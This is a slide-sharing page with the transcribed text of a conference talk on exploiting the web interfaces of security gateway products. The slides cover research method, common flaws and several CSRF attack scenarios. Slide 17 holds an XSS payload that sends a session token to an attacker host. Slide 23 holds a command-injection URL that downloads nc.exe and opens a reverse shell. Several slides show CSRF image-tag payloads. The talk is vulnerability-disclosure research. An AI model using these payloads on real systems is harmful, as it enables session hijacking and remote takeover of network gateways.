they ought to know better exploiting security gateways
play

They ought to know better: Exploiting Security Gateways via their - PowerPoint PPT Presentation

Aug 30, 2022 •169 likes •580 views

They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com Introduction 35+ Exploits found and

  1. They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com

  2. Introduction § 35+ Exploits found and reported to vendors of Security Gateways since October 2011 § Many are serious issues which can lead an external attacker to compromise the Gateway § Owning the Gateway can be quick, and powerful… as I will show you…

  3. Which kind of products? § Security Gateways - Multifunction Security Gateways - Email and Web filtering § Appliances and Software § Some examples include: - ClearOS, Untangle, McAfee, Proofpoint, Barracuda - Websense, Symantec (Brightmail)

  4. How are they deployed?

  5. What do they look like? Screenshots removed for slides

  6. My Exploit Research method § Find vendor site, sign-up § Download product evaluation - get eval-key (30 days) § Install VM and snapshot § “Blast it” with automated scanners § Prod and poke it with Burp - (majority of time) § SSH as root for whitebox testing § Create/test exploits § Log and report exploits

  7. Common vulnerabilities found § Input-validation issues (90% of products) - XSS, command-injection, SQLi, parameter-tampering § Predictable URLs & parameters = CSRF § Excessive privileges § Various session-management issues § Authentication bypass and information- disclosure § Out-of-date software, default configs/ content § Brute force password guessing - (too basic but lots of it)

  8. Attack stages § Phase one: - Gaining access to the UI § Phase two: - Gaining access to the operating- system

  9. Interesting examples 1 § ClearOS - Information disclosure

  10. Video removed for slides

  11. Video removed for slides

  12. Recap – UI ownage

  13. Video removed for slides

  14. Recap – Root shell and pivoting

  15. Post exploitation § It’s common for useful tools to be already installed - gcc - tcpdump - netcat - Nmap - Perl/Python - yum/apt-get - stunnel § File-system frequently not “hardened” - No SELinux

  16. Other session-token disclosure Screenshots removed for slides

  17. More session-tokens – bypassing cookie security § Bypass cookie security flags (Http-Only) § Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= \"http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + "\"")'>

  18. Attack scenarios § Direct access to the Security Gateway UI - Auth-bypass, session-hijacking, information-disclosure § No direct access to the UI - CSRF, XSS - (Requires reconnaissance, and interaction with users) - Special case of CSRF - OSRF with out-of-band XSS

  19. CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>

  20. CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>

  21. CSRFing Corporate Security Gateways Attacker Victim

  22. Interesting examples 2 § Websense - Unauthenticated command-injection as SYSTEM - Advanced CSRF

  23. Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo ¡.pdf%26echo ¡strUrl ¡%3d ¡^"http:^" ¡%2b ¡ chr(47) ¡%2b ¡chr(47) ¡%2b ¡^"192.168.233.11^" ¡%2b ¡chr(47) ¡%2b ¡^"nc.exe^"> ¡http.vbs %26echo ¡StrFile ¡%3d ¡^"nc.exe^" ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_DEFAULT ¡%3d ¡0 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_PRECONFIG ¡%3d ¡0 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_DIRECT ¡%3d ¡1 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_PROXY ¡%3d ¡2 ¡>> ¡http.vbs%26echo ¡Dim ¡http, ¡varByteArray, ¡ strData, ¡strBuffer, ¡lngCounter, ¡fs, ¡ts ¡>> ¡http.vbs%26echo ¡ ¡ ¡Err.Clear ¡>> ¡http.vbs %26echo ¡ ¡ ¡Set ¡http ¡%3d ¡Nothing ¡>> ¡http.vbs%26echo ¡ ¡ ¡Set ¡http ¡%3d ¡ CreateObject(^"WinHttp.WinHttpRequest.5.1^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡If ¡http ¡Is ¡ Nothing ¡Then ¡Set ¡http ¡%3d ¡CreateObject(^"WinHttp.WinHttpRequest^") ¡>> ¡http.vbs %26echo ¡ ¡ ¡If ¡http ¡Is ¡Nothing ¡Then ¡Set ¡http ¡%3d ¡ CreateObject(^"MSXML2.ServerXMLHTTP^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡If ¡http ¡Is ¡Nothing ¡ Then ¡Set ¡http ¡%3d ¡CreateObject(^"Microsoft.XMLHTTP^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡ http.Open ¡^"GET^", ¡strURL, ¡False ¡>> ¡http.vbs%26echo ¡ ¡ ¡http.Send ¡>> ¡http.vbs%26echo ¡ ¡ ¡ varByteArray ¡%3d ¡http.ResponseBody ¡>> ¡http.vbs%26echo ¡ ¡ ¡Set ¡http ¡%3d ¡Nothing ¡>> ¡ http.vbs%26echo ¡ ¡ ¡Set ¡fs ¡%3d ¡CreateObject(^"Scripting.FileSystemObject^") ¡>> ¡ http.vbs%26echo ¡ ¡ ¡Set ¡ts ¡%3d ¡fs.CreateTextFile(StrFile, ¡True) ¡>> ¡http.vbs%26echo ¡ ¡ ¡ strData ¡%3d ¡^"^" ¡>> ¡http.vbs%26echo ¡ ¡ ¡strBuffer ¡%3d ¡^"^" ¡>> ¡http.vbs%26echo ¡ ¡ ¡For ¡ lngCounter ¡%3d ¡0 ¡to ¡UBound(varByteArray) ¡>> ¡http.vbs%26echo ¡ ¡ ¡ ¡ ¡ ¡ ¡ts.Write ¡Chr(255 ¡ And ¡Ascb(Midb(varByteArray,lngCounter ¡%2b ¡1, ¡1))) ¡>> ¡http.vbs%26echo ¡ ¡ ¡Next ¡>> ¡ http.vbs%26echo ¡ ¡ ¡ts.Close ¡>> ¡http.vbs%26http.vbs%26nc.exe ¡192.168.233.11 ¡443 ¡-­‑e ¡ cmd.exe| ¡

  24. But how to exploit it?

  25. Problems with CSRFing internal products from outside § Who is the admin? § How do you get the admin to click something malicious whilst logged- in? § Product-UI port locked down to specific users? § Don’t know internal IP address of the product in advance?

  26. Ways to find DMZ IP addresses § From SMTP relays bounced messages § Misconfigured Web servers

  27. CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...

  28. Use the browser (and proxy)

  29. There’s no place like localhost § 127.0.0.1 § 127.0.0.2 § There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost

  30. CSRF proxy attack

  31. Proxy-killer <html> <img src= http://127.0.0.2:xxxx/...etc... </html>

  32. Did you understand that?

  33. Interesting examples 3 § Proofpoint ¡(video/demo) ¡ -­‑ Enumerate ¡email ¡addresses -­‑ OSRF ¡via ¡email ¡

  34. Video removed for slides

  35. Video removed for slides

  36. Video removed for slides

  37. Recap – UI ownage via OSRF

  38. Spot the problem

  39. Conclusion § Exploiting Security Gateway products offers powerful positions for an attacker § Wide range of issues, some very serious - Some easy to find, some harder § Most techniques used are several years old § I feel there is a big knowledge gap between secure website development and secure UI development

  40. Further research § This is a rich area for exploit- development - 35+ Exploits found so far in Security Gateways (just takes time) - Lots of similar products vulnerable to similar attacks § Other types of product - Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far - I’ve started looking at SSL VPNs

  41. Questions and suggestions § Whitepaper available at BlackHat EU § Company Website: http://www.ngssecure.com § Personal Blog: http://insidetrust.blogspot.com § QUESTIONS?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways Bradley Reaves , Nolen Scaife, Dave Tian, Logan Blue, Patrick Traynor, Kevin R. B. Butler Florida Institute of Cyber Security (FICS) SMS Ecosystem Cell

404 views • 14 slides
Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation

Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation

Topics Topics Tunneling Motivation Terminology Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation Interoperability Srinidhi Varadarajan Remote provisioning of functionality Enhanced

360 views • 7 slides
On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti,

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti,

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti, Thorsten Holz Horst Grtz Institute for IT-Security, Ruhr University Bochum, Germany Network and Distributed System Security Symposium 2020 1

581 views • 46 slides
Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling

Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling

Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling Motivation Terminology Examples Gateways Motivation Interoperability Remote provisioning of functionality Enhanced

872 views • 37 slides
Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval,

Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval,

Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval, Steve Kremer, Itsaka Rakotonirina Inria Nancy Grand-Est Security protocols TLS Wifi @ PASS E-voting E-passport 2 24 Security protocols

830 views • 69 slides
Gateways: Access to Jewish Education Mission: Gateways provides high quality special education

Gateways: Access to Jewish Education Mission: Gateways provides high quality special education

Gateways: Access to Jewish Education Mission: Gateways provides high quality special education services, expertise and support to enable students with diverse learning needs to succeed in Jewish educational settings and participate meaningfully

1.08k views • 65 slides
Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE

Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE

Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE resund Security Day, 2019 The early morning opening slide... There are two types of crypto talks... 1. We present a third preimage attack on

435 views • 21 slides
Exploiting Unix File-System Races via Algorithmic Complexity Attacks By Cai, Gui, Johnson

Exploiting Unix File-System Races via Algorithmic Complexity Attacks By Cai, Gui, Johnson

Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA Exploiting Unix File-System Races via Algorithmic Complexity

643 views • 31 slides
WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru

WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru

WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru Mohammed Rajkumar Ramadhin Alexander Martin Introduction With growing advancement in the &quot;Internet of Things&quot; we must take a look at the

468 views • 29 slides
Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine Learning Ashrith Barthur, PhD Security Research @cyberbaggage H 2 O .ai Machine Intelligence Sequence of Events (SoE) What is a Sequence of

636 views • 35 slides
Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul

Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul

Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul Kocher 1 , Jann Horn 2 , Anders Fogh 3 , Daniel Genkin 4 , Daniel Gruss 5 , Werner Haas 6 , Mike Hamburg 7 , Mortiz Lipp 5 , Stefan Mangard 5 ,

410 views • 13 slides
Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA

Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA

Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA Rocquencourt &amp; Trusted Logic 1 Outline 1. What makes strongly typed programs more secure? 2. Enforcing strong typing (bytecode verification). 3.

828 views • 45 slides
Title Slide Team Intro to Presentation Purpose Characteristics to be examined

Title Slide Team Intro to Presentation Purpose Characteristics to be examined

Title Slide Team Intro to Presentation Purpose Characteristics to be examined Gateways selected and why Methods used to examine the gateways Etc Locations of Gateways Chosen University Drive East TAMU Main Campus

303 views • 7 slides
Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21,

Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21,

Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21, 2008 Black Hat DC - Game Plan Introduction to VM migration Live migration security Exploiting live migration Future attacks and

441 views • 31 slides
Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data

Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data

Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data Gerome Miklau University of Massachusetts, Amherst DIMACS Workshop on Recent Work on Di ff erential Privacy across Computer Science October 2012

1.39k views • 136 slides
Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop

Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop

GABBs - Reusable Geospatial Data Analysis Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop on Science Gateways June 19-21, 2017 This work is supported in part by the NSF grant #1261727 Co-Authors

599 views • 36 slides
Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE

Introduction to Php Web-based applications: main elements HTTP PROTOCOL CLIENT SIDE SERVER SIDE HTTP request An HTTP request consists of: a request method (verb) , resource URL , header fields ( metadata ), body ( data ) HTTP 1.1

1.84k views • 146 slides
CernVM Online and Cloud Gateway a uniform interface for CernVM contextualization and deployment

CernVM Online and Cloud Gateway a uniform interface for CernVM contextualization and deployment

CernVM Online and Cloud Gateway a uniform interface for CernVM contextualization and deployment George Lestaris - Ioannis Charalampidis D. Berzano, J. Blomer, P . Buncic, G. Ganis and R. Meusel PH-SFT / CERN Background CernVM: a virtual

329 views • 30 slides
JavaScript Common Gateway Interface Batch oriented (fill in a form, get interactive

JavaScript Common Gateway Interface Batch oriented (fill in a form, get interactive

jonkv@ida Why JavaScript? 2 1994 1995: Wanted interactivity on the web Server side interactivity: CGI JavaScript Common Gateway Interface Batch oriented (fill in a form, get interactive results) &quot;Heavy

904 views • 5 slides
Lec09: Miscellaneous Insu Yun 2 Scoreboard 3 NSA Codebreaker Challenges 4 Administrivia

Lec09: Miscellaneous Insu Yun 2 Scoreboard 3 NSA Codebreaker Challenges 4 Administrivia

1 Lec09: Miscellaneous Insu Yun 2 Scoreboard 3 NSA Codebreaker Challenges 4 Administrivia Due: Lab09 is out and its due on Nov 10 NSA Codebreaker Challenge Due: Dec 1 5 Discussion: Lab08 What's the most

413 views • 29 slides
Internet Technologies 5-Dynamic Web F. Ricci 2010/2011 Content The &quot;meanings&quot; of

Internet Technologies 5-Dynamic Web F. Ricci 2010/2011 Content The &quot;meanings&quot; of

Internet Technologies 5-Dynamic Web F. Ricci 2010/2011 Content The &quot;meanings&quot; of dynamic Building dynamic content with Java EE (server side) HTML forms: how to send to the server the input PHP: a simpler language for

1.22k views • 52 slides
1 The http protocol: more WWW: the http protocol http is stateless http: hypertext

1 The http protocol: more WWW: the http protocol http is stateless http: hypertext

Internet apps: their protocols and transport protocols Application Underlying layer protocol Application transport protocol e-mail smtp [RFC 821] World Wide Web TCP remote terminal access telnet [RFC 854] TCP Web http [RFC 2068] TCP

438 views • 5 slides
SIMULTANEOUS MIGRATION OF CODECS, FORMATS AND DRM Jason Burgess June 12, 2018 BACKGROUND

SIMULTANEOUS MIGRATION OF CODECS, FORMATS AND DRM Jason Burgess June 12, 2018 BACKGROUND

SIMULTANEOUS MIGRATION OF CODECS, FORMATS AND DRM Jason Burgess June 12, 2018 BACKGROUND OVERVIEW OF XFINITY TV LIVE TV VIDEO ON DEMAND CLOUD DVR AVAILABLE BOTH IN AND OUT OF HOME OVER 14,000 LIVE STREAMS OVER 900,000 ON DEMAND ASSETS

434 views • 20 slides
Intermediate Representaions Concepts of Programming Languages (CoPL) Malte Skambath

Intermediate Representaions Concepts of Programming Languages (CoPL) Malte Skambath

Intermediate Representaions Concepts of Programming Languages (CoPL) Malte Skambath malte@skambath.de November 16, 2015 Intermediate Overview Representaions Malte Skambath We need Compilers! We need Compilers! Classical Compiler Process

915 views • 42 slides

More recommend